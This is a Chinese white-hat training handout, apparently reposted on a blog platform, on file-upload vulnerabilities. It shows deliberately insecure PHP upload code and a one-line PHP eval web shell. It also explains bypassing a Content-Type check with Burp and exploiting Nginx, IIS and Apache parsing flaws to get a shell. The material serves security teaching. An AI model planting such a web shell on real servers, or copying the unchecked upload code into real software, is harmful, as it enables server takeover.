米斯特白帽培训讲义 漏洞篇 文件上传

简介: 米斯特白帽培训讲义 漏洞篇 文件上传 讲师:gh0stkey 整理:飞龙 协议:[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0我们首先看一下文件上传的流程图。

米斯特白帽培训讲义 漏洞篇 文件上传

讲师:gh0stkey

整理:飞龙

协议:[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0

我们首先看一下文件上传的流程图。

其中,浏览器通过上传页面将文件储存到服务器中。一般这些上传页面都会有限制(比如限制格式为jpg/gif/png等等,或者限制文件大小)。

我们所关注的这个上传页面,一旦限制了文件就可能导致我们的渗透测试失败。那么真的完全失败了吗?后面会讲到很多方法,代码本身我们突破不了,但是我们可以用这些方法来绕过限制。

漏洞页面大致分为两种,一种是不限制任何格式,随意上传,这种现在比较少了。另一种是限制Content-type,虽然它限制了文件类型,但我们就可以突破它。

任意文件上传

看一下这段代码:

<form action="" method="POST" ENCTYPE="multipart/form-data">
    点这里上传文件:
    <input type="file" name="userfile">
    <input type="submit" value="提交">
</form>
<?php
if(!isset($_FILES['userfile']))
    exit;
echo "<pre>";
print_r($_FILES);
echo "</pre>";
$uploaddir='upfile/';
$PreviousFile=$uploaddir.basename(@$_FILES['userfile']['name']);
if(move_uploaded_file(@$_FILES['userfile']['tmp_name'], $PreviousFile))
    echo '上传成功!';
else
    echo '上传失败!';

首先是一个文件上传表单,我们可以看到表单中多了一个enctype属性,是因为文件上传的格式和之前不一样,不加这个就无法识别了。

然后会检查是否接受到了上传文件,没有接收到就直接结束。之后会打印出文件信息,便于我们调试。之后将上传文件的名称和保存上传文件的目录拼接,将文件从临时目录移动到这个目录。最后输出成功或失败信息。

将其保存为upfile.php后,我们首先访问它并尝试上传一个文件。我们把一句话<?php @eval($_POST['a']) ?>写入1.php,然后把它上传到服务器。

于是我们看到上传成功。

我们可以看到打印出的文件信息,其中:

  • userfile是这个文件在数组中的索引,也是表单中的文件上传输入框的名称。
  • name是这个文件的文件名。
  • type是这个文件的类型。
  • tmp_name是这个文件的临时完整路径。
  • error是错误代码。
  • size是文件大小。

之后,尝试直接访问所上传的文件,发现访问成功。

然后我们就可以拿菜刀连接了。

我们可以看到连接成功,那么我们就成功地 GetShell 了。

存在限制

如果upfile.php的内容变成这样:

<form action="" method="POST" enctype="multipart/form-data">
    点这里上传文件:
    <input type="file" name="userfile">
    <input type="submit" value="提交">
</form>
<?php
if(!isset($_FILES['userfile']))
    exit;
echo "<pre>";
print_r($_FILES);
echo "</pre>";
if(@$_FILES['userfile']['type'] != "image/gif"){
        echo "对不起,我们只允许上传GIF格式的图片!!";
        exit;
}
$uploaddir='upfile/';
$PreviousFile=$uploaddir.basename(@$_FILES['userfile']['name']);
if(move_uploaded_file(@$_FILES['userfile']['tmp_name'], $PreviousFile))
    echo "上传成功!";
else
    echo "上传失败!";

这段代码多出来的东西就是,它首先验证了文件类型,如果是gif则放过,不是则拦截。那么根据multipart编码类型,type这个东西在浏览器生成之后,是可以改的。我们可以通过 Burp 拦截并修改这个值。

首先我们打开 Burp,配置代理,访问upfile.php。之后开启拦截模式并上传一个文件:

我们拦截之后,找到Content-Type,发现他是application/oct-stream,我们把它改成image/gif,之后放行(可能需要多次,在我这里是这样)。

然后我们可以看到上传成功,上传目录中出现了我们上传的文件。

Nginx 解析漏洞

如果服务器是 Nginx,我们可以直接上传图片格式,利用解析漏洞拿 Webshell。漏洞成因是,由于 Nginx 部分版本程序自身的漏洞,导致可以解析并执行非脚本文件。

假设存在漏洞的站点上有一张图片,URL 地址为:

www.xxx.com/logo.jpg

我们正常访问时,Nginx 会把它当做非脚本,直接读取并传给客户端。但是如果我们这样访问:

www.xxx.com/logo.jpg/a.php

他就会把logo.jpg当做 PHP 文件来执行。或者是

www.xxx.com/logo.jpg%00.php

也会导致图片执行,这个是 7 月中旬爆出的解析漏洞。

要利用这个漏洞,我们可以随便找一张图片,在里面插入一句话:

我们将其上传之后,访问图片的 URL,确认上传成功。

然后我们利用该解析漏洞构造 URL,发现也能够成功访问,也能拿菜刀来连接。

IIS 解析漏洞

IIS 5.x/6.0 主要存在两个解析漏洞,第一个是目录解析:

/a.asp/b.jpg

其中a.asp是目录,b.jpg是真实存在的文件,那么b.jpg会当做asp文件来执行。这个漏洞需要我们能够创建目录。

第二个是文件解析,也就是分号截断:

a.asp;.jpg

这个文件的扩展名在上传时是jpg,但是上传之后,IIS 会把它当做asp文件来解析。

另外,在IIS 中,可执行脚本的扩展名除了asp之外,还有asacdxcer。许多网站往往就过滤不全,一定要重视!!

Apache 解析漏洞

Apache 的解析漏洞比较有意思,它从右到左解析扩展名,如果碰到不认识的扩展名,则继续往下解析。比如我们上传a.php.x1.x2.x3,它按照x3 x2 x1 php的顺序解析扩展名,但是他不认识后面三个,所以只能将其解析为php。但在文件上传时,文件的扩展名一直是x3,所以可以绕过一些校验。

参考

相关文章
|
安全 .NET 开发框架
米斯特白帽培训讲义(v2)实战篇 捷达系统
米斯特白帽培训讲义 实战篇 捷达系统 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 概述 官网:http://www.jeedaa.com/ 主要产品有: 捷达ERP 捷达OA 捷达eHR 捷达CRM 捷达eFax 捷达仓库管理 捷达进销存.Net 捷达协同办公.Net 均存在能够 GetShell 的漏洞。
1011 0
|
索引
米斯特白帽培训讲义(v2)实战篇 迅雷 CMS
米斯特白帽培训讲义 实战篇 迅雷 CMS 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 站点搜索 关键词:intext:"技术支持:银川迅雷网络公司" 另外这个 CMS 是闭源的,没有找到源码。
1364 0
|
PHP
米斯特白帽培训讲义(v2)实战篇 余闻同学录
米斯特白帽培训讲义 实战篇 余闻同学录 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 站点搜索 百度关键词搜索: 源码下载 http://download.csdn.net/download/u012513463/9701150 目录结构是这样的: 弱密码 安装之后会弹出以下界面: 得知弱密码为admin:123456。
1135 0
|
安全 应用服务中间件 PHP
米斯特白帽培训讲义(v2)漏洞篇 文件上传
米斯特白帽培训讲义 漏洞篇 文件上传 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 我们首先看一下文件上传的流程图。
1158 0
|
编解码 网络协议 安全
米斯特白帽培训讲义(v2)漏洞篇 SSRF
米斯特白帽培训讲义 漏洞篇 SSRF 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 很多 Web 应用都提供了从其他服务器上获取数据的功能。
1224 0
|
监控 安全 PHP
米斯特白帽培训讲义(v2)漏洞篇 文件包含
米斯特白帽培训讲义 漏洞篇 文件包含 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 原理 文件包含就是将一个文件包含到自己的文件中执行。
1227 0
|
安全 数据安全/隐私保护 Windows
米斯特白帽培训讲义(v2)漏洞篇 提权
米斯特白帽培训讲义 漏洞篇 提权 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 提权,顾名思义就是提高自己在服务器中的权限,就比如在 Windows 中你本身登录的用户是 guest,通过提权后就变成超级管理员,拥有了管理 Windows 的所有权限。
1077 0
|
Web App开发 存储 安全
米斯特白帽培训讲义(v2)漏洞篇 XSS
米斯特白帽培训讲义 漏洞篇 XSS 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS 。
1127 0
|
安全 JavaScript 数据安全/隐私保护
米斯特白帽培训讲义(v2)漏洞篇 第三方风险
米斯特白帽培训讲义 漏洞篇 第三方风险 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 域名商 域名商就是提供域名购买的站点。
1168 0
|
PHP CDN
米斯特白帽培训讲义(v2)信息收集
米斯特白帽培训讲义 信息收集 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.
1740 0

热门文章

最新文章